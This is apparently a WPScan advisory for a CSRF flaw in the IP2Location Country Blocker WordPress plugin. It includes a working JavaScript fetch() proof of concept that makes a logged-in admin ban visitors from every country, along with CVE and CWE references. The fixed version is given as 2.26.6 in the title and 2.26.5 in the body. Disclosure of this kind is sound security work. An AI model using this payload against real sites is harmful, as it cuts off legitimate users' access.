WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF

Description

The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.

Proof of Concept

Make an admin open a page with the following code in it, which will ban visitors from all countries:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) { console.log(data); });

Affects Plugins

ip2location-country-blocker
Fixed in version 2.26.5

References

CVE
CVE-2021-25108
URL
https://plugins.trac.wordpress.org/changeset/2653459

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
9d416ca3-bd02-4fcf-b3b8-f2f2280d02d2

Timeline

Publicly Published

2022-01-06 (about 8 months ago)

Added

2022-01-06 (about 8 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin